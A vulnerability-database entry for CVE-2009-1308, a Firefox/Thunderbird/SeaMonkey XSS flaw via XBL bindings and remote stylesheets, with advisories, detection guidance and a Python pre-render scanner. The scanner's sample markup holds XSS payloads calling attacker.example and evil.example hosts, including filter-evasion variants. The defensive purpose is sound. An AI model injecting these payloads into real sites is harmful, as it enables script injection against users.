CVE-2009-1308
Published: 2009-04-22
Priority: P2 · 73 · medium
CVSS 2.0: 4.3 · AV:N/AC:M/Au:N/C:N/I:P/A:N
In the wild: VulnCheck KEV · Exploited in the wild
EPSS: 2.29% (81.0th percentile)
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing.
Affected
88 ranges (showing 25; the other 24 displayed rows list mozilla / firefox with no version or fix data and are omitted here)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 3.0.8 | — |
Detection & IOCs (extracted from sources)
- XSS via XBL JavaScript bindings combined with remote/third-party stylesheets: restrict or alert on cross-origin XBL binding loads in Firefox/SeaMonkey/Thunderbird versions prior to 3.0.9.
- The vulnerability was exploited in the wild via a malicious eBay listing in March 2009; on web platforms that accept user-supplied HTML or CSS, monitor that content for XBL binding references and for stylesheets pulled from third-party hosts.
- Mozilla mitigated this by enforcing the same-origin policy for XBL bindings; the vulnerability only applies to Firefox before 3.0.9, and to Thunderbird and SeaMonkey builds that lack this restriction.
- Affected products include Mozilla Firefox before 3.0.9, Thunderbird (unversioned at time of advisory), and SeaMonkey; patched packages include firefox-3.0.9 and xulrunner-1.9.0.9.
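Added example (not from this record, from Mozilla, or from any vendor listed below): a server-side scan of user-supplied HTML/CSS of the kind the eBay bullet above calls for, run before a platform renders a listing or profile. It assumes that an XBL binding is attached through the CSS -moz-binding property, which is how Gecko applied XBL, and that the platform keeps an allowlist of its own stylesheet hosts (the hypothetical TRUSTED_STYLE_ORIGINS). Because the in-the-wild vector hid the binding in a remote stylesheet, off-site @import and link references are flagged as well as the binding itself, and the usual filter evasions (entity encoding, CSS comments inside the property name, CSS hex escapes) are normalized away first. All sample markup is constructed.

```python
# Added example: pre-render scan of user-supplied markup for XBL hazards.
# Not code from the CVE record or from Mozilla. TRUSTED_STYLE_ORIGINS and
# the sample markup are hypothetical / constructed.
import html
import re
from urllib.parse import urlparse

# Hypothetical allowlist: origins from which the platform itself serves CSS.
TRUSTED_STYLE_ORIGINS = {"https://static.example.com"}

_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# CSS hex escape: backslash, 1-6 hex digits, optional single whitespace.
_ESCAPE_RE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?")
# The property that attaches an XBL binding in Gecko.
_BINDING_RE = re.compile(
    r"-moz-binding\s*:\s*url\s*\(\s*['\"]?([^'\")\s]*)", re.I)
_IMPORT_RE = re.compile(
    r"@import\s+(?:url\s*\(\s*)?['\"]?([^'\")\s;]+)", re.I)
_LINK_RE = re.compile(
    r"<link\b(?=[^>]*\brel\s*=\s*['\"]?stylesheet)"
    r"[^>]*\bhref\s*=\s*['\"]?([^'\"\s>]+)",
    re.I)


def normalize_css(text: str) -> str:
    r"""Undo common filter-evasion tricks before pattern matching:
    HTML entities inside style attributes, CSS comments splitting a
    property name (-moz-/**/binding) and CSS hex escapes (-moz-\62 inding)."""
    text = html.unescape(text)
    text = _COMMENT_RE.sub("", text)
    return _ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def _is_offsite(url: str) -> bool:
    """Relative URLs resolve to the platform's own origin; absolute URLs
    are off-site unless their origin is on the allowlist."""
    p = urlparse(url.strip())
    if not p.scheme and not p.netloc:
        return False
    return f"{p.scheme}://{p.netloc}".lower() not in TRUSTED_STYLE_ORIGINS


def find_xbl_hazards(content: str) -> list[tuple[str, str]]:
    """Return (kind, target) findings for one piece of user-supplied content.

    Any -moz-binding is reported regardless of where it points, because
    user content has no legitimate reason to attach a binding at all.
    Stylesheet references are reported only when they leave the trusted
    origins, which is how an attacker keeps the binding itself out of
    the submitted markup.
    """
    css = normalize_css(content)
    findings = [("xbl-binding", m.group(1)) for m in _BINDING_RE.finditer(css)]
    findings += [("offsite-import", m.group(1))
                 for m in _IMPORT_RE.finditer(css) if _is_offsite(m.group(1))]
    findings += [("offsite-stylesheet", m.group(1))
                 for m in _LINK_RE.finditer(css) if _is_offsite(m.group(1))]
    return findings


# Constructed samples; not captured from the 2009 eBay listing.
SAMPLES = {
    "plain": '<div style="-moz-binding: url(http://attacker.example/xbl.xml#ev)">x</div>',
    "escaped": '<div style="-moz-\\62 inding:url(&quot;http://evil.example/x.xml#b&quot;)">',
    "comment": "<style>p{-moz-/**/binding:url(http://a.example/b.xml#x)}</style>",
    "import": '<style>@import url("http://evil.example/listing.css");</style>',
    "link": '<link href="http://evil.example/s.css" rel=stylesheet>',
    "trusted": '<link rel="stylesheet" href="https://static.example.com/theme.css">',
    "benign": '<p style="color:red">Benign listing text</p>',
}

if __name__ == "__main__":
    for name, markup in SAMPLES.items():
        print(f"{name:8s} {find_xbl_hazards(markup)}")
```

The normalization pass is deliberately lossy (entity decoding can alter query strings, for instance); that is acceptable for a detector whose job is to refuse or quarantine content, not to rewrite it. Relative binding URLs are still reported because a binding file hosted on the platform itself stays same-origin and is unaffected by the 3.0.9 restriction.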
CVSS provenance
- nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
- vulncheck · 4.3 MEDIUM
- vendor_ubuntu · 5.8 MEDIUM
- vendor_redhat · 4.3 MEDIUM
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu · 2009-06-25 · CVSS 5.0
CVE-2009-1303 [MEDIUM]
Several flaws were discovered in the JavaScript engine of Thunderbird. If a
user had JavaScript enabled and were tricked into viewing malicious web
content, a remote attacker could cause a denial of service or possibly
execute arbitrary code with the privileges of the user invoking the
program. (CVE-2009-1303, CVE-2009-1305, CVE-2009-1392, CVE-2009-1833,
CVE-2009-1838)
Several flaws were discovered in the way Thunderbird processed malformed
URI schemes. If a user were tricked into viewing a malicious website and
had JavaScript and plugins enabled, a remote attacker could execute
arbitrary JavaScript or steal private data. (CVE-2009-1306, CVE-2009-1307,
CVE-2009-1309)
Cefn Hoile discovered Thunderbird did not adequa
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu · 2009-04-23 · CVSS 5.8
CVE-2009-1302 [MEDIUM]
Several flaws were discovered in the browser engine. If a user were tricked
into viewing a malicious website, a remote attacker could cause a denial of
service or possibly execute arbitrary code with the privileges of the user
invoking the program. (CVE-2009-1302, CVE-2009-1303, CVE-2009-1304,
CVE-2009-1305)
It was discovered that Firefox displayed certain Unicode characters which
could be visually confused with punctuation in valid web addresses in the
location bar. An attacker could exploit this to spoof the location bar,
such as in a phishing attack. (CVE-2009-0652)
Several flaws were discovered in the way Firefox processed malformed URI
schemes. If a user were tricked into viewing a maliciou
Red Hat
Firefox XSS hazard using third-party stylesheets and XBL bindings
vendor_redhat · 2009-04-21 · CVSS 4.3
CVE-2009-1308 [MEDIUM] CWE-79
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing.
GHSA
GHSA-chqp-7f63-6c5w: Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3
ghsa_unreviewed · 2022-05-02
CVE-2009-1308 [MEDIUM] CWE-79
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing.
VulnCheck
Mozilla Firefox Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck · 2009 · CVSS 4.3
CVE-2009-1308 [MEDIUM]
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing.
Affected: Mozilla Firefox
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2009-1308; https://www.cve.org/CVERecord?id=CVE-2009-1308
No detection rules found.
No public exploits indexed.
References
http://lists.opensuse.org/opensuse-security-announce/2009-05/msg00000.html
http://secunia.com/advisories/34758
http://secunia.com/advisories/34780
http://secunia.com/advisories/34843
http://secunia.com/advisories/34894
http://secunia.com/advisories/35042
http://secunia.com/advisories/35065
http://secunia.com/advisories/35536
http://sunsolve.sun.com/search/document.do?assetkey=1-66-264308-1
http://www.debian.org/security/2009/dsa-1797
http://www.mandriva.com/security/advisories?name=MDVSA-2009:111
http://www.mandriva.com/security/advisories?name=MDVSA-2009:141
http://www.mozilla.org/security/announce/2009/mfsa2009-18.html
http://www.redhat.com/support/errata/RHSA-2009-0436.html
http://www.redhat.com/support/errata/RHSA-2009-1126.html
http://www.securityfocus.com/bid/34656
http://www.securitytracker.com/id?1022097
http://www.theregister.co.uk/2009/03/08/ebay_scam_wizardy/
http://www.ubuntu.com/usn/usn-782-1
http://www.vupen.com/english/advisories/2009/1125
https://bugzilla.mozilla.org/show_bug.cgi?id=481558
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10428
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6173
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6185
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6296
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7285
https://usn.ubuntu.com/764-1/
https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00683.html